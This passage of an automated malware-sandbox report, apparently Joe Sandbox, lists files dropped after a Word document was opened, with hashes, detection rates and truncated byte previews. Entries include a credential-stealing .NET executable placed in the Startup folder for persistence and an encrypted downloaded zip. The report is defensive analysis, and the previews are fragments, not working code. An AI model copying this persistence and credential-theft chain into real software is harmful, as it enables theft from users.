                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):227328
                                                                                    Entropy (8bit):6.2114772668268765
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:XGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17BH1grRBkrY1SZJGEVMFL5k:v6iee4xUi6Mf8nom3MWt7BVgrRBwY1Sd
                                                                                    MD5:6D8282E9F5AA75B07B018DC5CC2F6BC7
                                                                                    SHA1:6C7305E49E0112CAB9CA1E2959697DAE61D9B209
                                                                                    SHA-256:E5BDA70E2BD4948C011C1115DACD4DE5F9E3F0641066C16567EA05FD7F5C1398
                                                                                    SHA-512:E00DC8CF4194907844159B9D8F1CEE56BC476D0F97986AEAB8C6B854375FB4379D9A673C5685FCD2FBA0869DCF097C2E6E43D76DD6884D738C11DB6E0BC7F012
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    • Antivirus: Virustotal, Detection: 54%, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................`.....................................S.... .............................|................................................ ............... ..H............text........ ...................... ..`.rsrc....... ......................@..@.reloc...............v..............@..B........................H............Z......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........

                                                                                    C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):118
                                                                                    Entropy (8bit):3.5700810731231707
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                    Malicious:false
                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.H.e.a.r.t.b.e.a.t.C.a.c.h.e./.>.

                                                                                    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scr

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):227328
                                                                                    Entropy (8bit):6.2114772668268765
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:XGo6iee4xUZA9Pt6Mf8noNM3MWQ/s17BH1grRBkrY1SZJGEVMFL5k:v6iee4xUi6Mf8nom3MWt7BVgrRBwY1Sd
                                                                                    MD5:6D8282E9F5AA75B07B018DC5CC2F6BC7
                                                                                    SHA1:6C7305E49E0112CAB9CA1E2959697DAE61D9B209
                                                                                    SHA-256:E5BDA70E2BD4948C011C1115DACD4DE5F9E3F0641066C16567EA05FD7F5C1398
                                                                                    SHA-512:E00DC8CF4194907844159B9D8F1CEE56BC476D0F97986AEAB8C6B854375FB4379D9A673C5685FCD2FBA0869DCF097C2E6E43D76DD6884D738C11DB6E0BC7F012
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SYTv5.scr, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 50%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.................. ........@.. ....................................`.....................................S.... .............................|................................................ ............... ..H............text........ ...................... ..`.rsrc....... ......................@..@.reloc...............v..............@..B........................H............Z......0....................................................0..w.............%.T...(.........~....s..........]..........~.....".".~.....\.\.~......b.~.......f.~.......n.~.......r.~.......t.*..0.............(....,..*r...ps....z..0..!..........,..o.............(....Q+...Q.*....0..5........(.......(....-#.,..o.....(....-..%-.&(......o....*.*&...(....*^......(.....(.........*^......(.....(.........*..0.......... ....s........(....-..*.o....*2.(....(....*..0..........

                                                                                    C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vhcst.exe.log

                                                                                    Download File
                                                                                    Process:C:\2716439\vhcst.exe
                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                    Category:modified
                                                                                    Size (bytes):1965
                                                                                    Entropy (8bit):5.377802142292312
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHhAHKKkpLHDJHqHGHK+HKs:iq+wmj0qCYqGSI6owJtzHeqKkpLVKmqs
                                                                                    MD5:582A844EB067319F705A5ADF155DBEB0
                                                                                    SHA1:68B791E0F77249BF83CD4B23A6C4A773365E2CAD
                                                                                    SHA-256:E489CF4E6C01EFE8827F172607D7E3CD89C4870B0B0CA5A33EFE64577E2CB8A9
                                                                                    SHA-512:6F530A0E2D3910459AFEFD0295ACA93D3814AB98D9A6E2BE1C2B8B717F075C87EF908BBF955E38F7B976EC51ED512645D13D0FB60AC865867E573060C5D76B59
                                                                                    Malicious:false
                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:JSON data
                                                                                    Category:dropped
                                                                                    Size (bytes):521377
                                                                                    Entropy (8bit):4.9084889265453135
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                    MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                    SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                    SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                    SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                    Malicious:false
                                                                                    Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830

                                                                                    C:\Users\user\AppData\Local\Microsoft\FontCache\4\PreviewFont\flat_officeFontsPreview_4_40.ttf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                    Category:dropped
                                                                                    Size (bytes):773040
                                                                                    Entropy (8bit):6.55939673749297
                                                                                    Encrypted:false
                                                                                    SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                    MD5:4296A064B917926682E7EED650D4A745
                                                                                    SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                    SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                    SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                    Malicious:false
                                                                                    Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..

                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2278
                                                                                    Entropy (8bit):3.8369384863558302
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:uiTrlKxsxxgxl9Il8ukm+rJaf7Mznm7cM6RxGCMd1rc:vMYSm+rJafQzmwM63J
                                                                                    MD5:A0C3B37365FDA016C41636577B30810D
                                                                                    SHA1:C624252458521BBD4B6B25B63D8EA80ED6024F4F
                                                                                    SHA-256:2826AC54616AEDC4A7F1E891E4EB6D6BE47555CD87B78F4E2C219B51D385F8B0
                                                                                    SHA-512:74206D71B7F6203D8C9EDDD51E79F12B71AA2537085E70167D67A4C560B1901A99499536E7FAB79EBE38DFDACEF3A5CCC67645F6EE4E27A7BBC1FB5E9FE036FF
                                                                                    Malicious:false
                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.I.g.b.Y.r.o./.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.f.2.V./.K.

                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):2684
                                                                                    Entropy (8bit):3.898282483151839
                                                                                    Encrypted:false
                                                                                    SSDEEP:48:uiTrlKxJxHxl9Il8ukm+rDCrSLzt5k0PyJlFYRBWG+fjd/vc:OYSm+r2a5FP1B5+m
                                                                                    MD5:D81284E22C665B61A6887B5BE5A26907
                                                                                    SHA1:7A9EA25889976127BF1DD92DB26215627FA22C16
                                                                                    SHA-256:71D846A6FE1D48DC50752894036DF3D0DC3ACB0AD1767C490F523CDBA6E96072
                                                                                    SHA-512:91BE3E0681768BAF06EE7A28233F89B7D3653CFC7B1CC9A8F187309F9BAF39C66A9DC21FEDD72BF7362AC657FDC3209FFBB556EAAD326340C7ABF1317CAB2193
                                                                                    Malicious:false
                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".0.3.R.z.e.Y.N.e.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.f.2.V./.K.

                                                                                    C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4542
                                                                                    Entropy (8bit):3.9984508613267162
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:qYSm+rro84uWU9OolSkrNf6IiPvWu81jpZWAK69GJB9WlQD:q/mIro84uWk/lSkrdxiWuMjWAKOGJbWa
                                                                                    MD5:C574FC016332F2B1AFCA10E351111F60
                                                                                    SHA1:4A2CEB3FA84672F36D7BA809A7D3EA2E73DC27B0
                                                                                    SHA-256:DF2CC6DC5EFBAF2A0CCC6642EA39472E0E87DA74ACDA12C3C10099EFFC03757F
                                                                                    SHA-512:1910A23671C7B3ED20E8D4C504E73037A759B4A6A9604F7C7582F3EEAC6418CE0568F80B713B13BCA54833289FDB437606BFCB26E15B02D1A92A49F5AB93D2A3
                                                                                    Malicious:false
                                                                                    Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.q.Y.a.6.3.X.Y.9.b.4.Y.b.C.Z.g.f.0.u.y.E.6.v.n.x.e.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".e.c.I.G.S.L.I./.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.b.f.2.V./.K.

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{BAF6D361-EABD-43BD-AF80-06993D3F99C2}.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                    Category:dropped
                                                                                    Size (bytes):16384
                                                                                    Entropy (8bit):4.673686979647891
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:otf/BxpEbe3RaZ71hYF8KItdu0jZ6YP/N:vbK4Z71hM8KImqj
                                                                                    MD5:CC53106D84ED38595C4769B2B0C2BF8D
                                                                                    SHA1:B721F06CC0AB260810DC87031E50502B0C15F3B3
                                                                                    SHA-256:9B18BDA07B5C7BD9E266FFBBA706EB21BC88FE716E5079A5614D58EACAAA965A
                                                                                    SHA-512:840C8FDDBC30EFBB34AC3B08B8AAC98F0AD1E7D113788D23E4CDCC49FEE0015AFEB877C93F9FE4EF9A55F7F04A00366ECC230BF3E0AB6814715D96004767A9A1
                                                                                    Malicious:false
                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{41714198-C4F9-434A-B6CC-D101C1DC11CD}.tmp

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):1024
                                                                                    Entropy (8bit):0.05194905805374581
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:1lvlxlln:vz
                                                                                    MD5:FB294ADA09B99EF2DEFEDC229C6C3EF7
                                                                                    SHA1:D15075354757A59DE6E057435511D956663955FB
                                                                                    SHA-256:8B2E62CCAF3758D056D38071A1C4E0F0C9402FEC9F951801E394020235F8C099
                                                                                    SHA-512:AF6EFE82BEB4C57C61A5F769AE95810A277A5A791F698FE3BCF957197804D91A3170B505D5CD353870121D2F4A99131C61A41E0779DB51821845DD046490D09E
                                                                                    Malicious:false
                                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\b5uubc[1].zip

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):83519
                                                                                    Entropy (8bit):7.991085993201395
                                                                                    Encrypted:true
                                                                                    SSDEEP:1536:QjC07FWxbvfXjwTqKZS81LDKS65U0ttMMD2d43hyZVKtKp3pvjmmjGfRoWq5Hyrp:QjC07IxbnUfXGd5UeW1JVpbmmaZoml
                                                                                    MD5:86B27920F9EFB4BF04ACD0145AB24520
                                                                                    SHA1:9627249E7A4B2557469ACC613E13C721715410F0
                                                                                    SHA-256:C1AFC1A202BAACA1267FCBCCAFBB8387C3B084419DF1488A829017DBAE37ED96
                                                                                    SHA-512:A7069CBB34818A4F752CAFB2091FFE2638F56D826A3B1F0B9A91296E912B179ACDB2D68B77D44607D12014E6A71F4C9BC016CBE5D180A657E1C80094795F1DB9
                                                                                    Malicious:true
                                                                                    Preview:PK........q%yY....E...x......vhcst.exe.}y....uUu.>3...={...ew......+.:....D...A.....P..Hb.D.h.....5F.y.&..&j..<..3...,..r..j.:=.......{.......9...%E.$...{%.Q.......p.d.....zi..._....U..u.y.u....\..\.be...}.......<{ew,../.8.PI:.H......-i./.$I..%......V...s...n..9...%J>.JI........g!...hW..n....]E.B...Z.Q.....h..G....W^....I..*....V.:K..6.Q........9.....Y..6S^...r.a....9......Oz.T...$.[.....H...u+....\.J....7.B...OA.(T..YNR.k0..2c3cogjYf.Sm.....#.pf..b.KP....`.,... u9..PB-/kY......o..U..MHO..|Z6.).#.....R.....%.H.rM..4@K.+I..*].|.f....0$t.....h.ZS...Y-.)....i. ..l.H.Ywc..O......`..>...hY."kF=...f...."...D.*....0..e9[..r*.{..?..Q,z .l.......K.f_G....e...j.e&8:......PflO\..............D.2+zj.6.kR(.....^K(c...L...j..c.f..w.^Q^....L...p...EV.$..3.....F.".@._M....Zz...1..rL..j...S..."-.h..*5....h!]5..a..4..Sy<..S=.Dr.m{.A..t.3>..5.`h.Vq...&..\...1.u+r.k.b.?....[Eh_8*@.K..D.y.\...S..l"b.Q&......DS.h2K.B....|4...,..ANV...P.oqh;.....P.j.w.r'......

                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                    Download File
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):0.34726597513537405
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Nlll:Nll
                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                    Malicious:false
                                                                                    Preview:@...e...........................................................

                                                                                    C:\Users\user\AppData\Local\Temp\Diagnostics\WINWORD\App1732591164537174100_C924DA62-D5EB-47E9-8B9D-A5267BEF87BC.log

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:ASCII text, with very long lines (7823), with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):27732
                                                                                    Entropy (8bit):5.488646309114468
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ADTPWjFNCLGu2Dzuwr5rTLZXvzCnYe+LXFAVEhDkE8B9IpvJwTaQf+Ep:ADTPWjFNCLwDzNr1TLZXvzCnYe+LXFA1
                                                                                    MD5:4D674220E0CE910E2D98BD5954F78878
                                                                                    SHA1:C66180089CB66878762F9544CB4B13EEFB72FB83
                                                                                    SHA-256:9EE10E4663808A90BA4AEF0F057B9DB7749043E0BCAC3C4028D3D90F82EAEABD
                                                                                    SHA-512:74C54B5613F1B0F80E8FE108975FC8752757117A7B19BCBB69C6C1A61517AF4309D32ECA98FACFADE5C22F0B9E077BC68D695741203D869984C44F5BD5F5C8E3
                                                                                    Malicious:false
                                                                                    Preview:Timestamp.Process.TID.Area.Category.EventID.Level.Message.Correlation..11/26/2024 03:19:24.701.WINWORD (0x1CC4).0x1D2C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.LoadXmlRules","Flags":33777014401990913,"InternalSequenceNumber":23,"Time":"2024-11-26T03:19:24.701Z","Contract":"Office.System.Activity","Activity.CV":"YtokyevV6UeLnaUme++HvA.7.1","Activity.Duration":145,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Activity.Result.Code":-2147024890,"Activity.Result.Type":"HRESULT","Activity.Result.Tag":528307459}...11/26/2024 03:19:24.717.WINWORD (0x1CC4).0x1D2C.Microsoft Word.Telemetry Event.b7vzq.Medium.SendEvent {"EventName":"Office.Telemetry.ProcessIdleQueueJob","Flags":33777014401990913,"InternalSequenceNumber":24,"Time":"2024-11-26T03:19:24.717Z","Contract":"Office.System.Activity","Activity.CV":"YtokyevV6UeLnaUme++HvA.7","Activity.Duration":3741,"Activity.Count":1,"Activity.AggMode":0,"Activity.Success":false,"Data.FailureD

                                                                                    C:\Users\user\AppData\Local\Temp\GAnbZeQjHIsjycS

                                                                                    Download File
                                                                                    Process:C:\7037005\vhcst.exe
                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                    Category:dropped
                                                                                    Size (bytes):28672
                                                                                    Entropy (8bit):2.5793180405395284
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                    MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                    SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                    SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                    SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                    Malicious:false
                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE381.tmp\APASixthEditionOfficeOnline.xsl

                                                                                    Download File
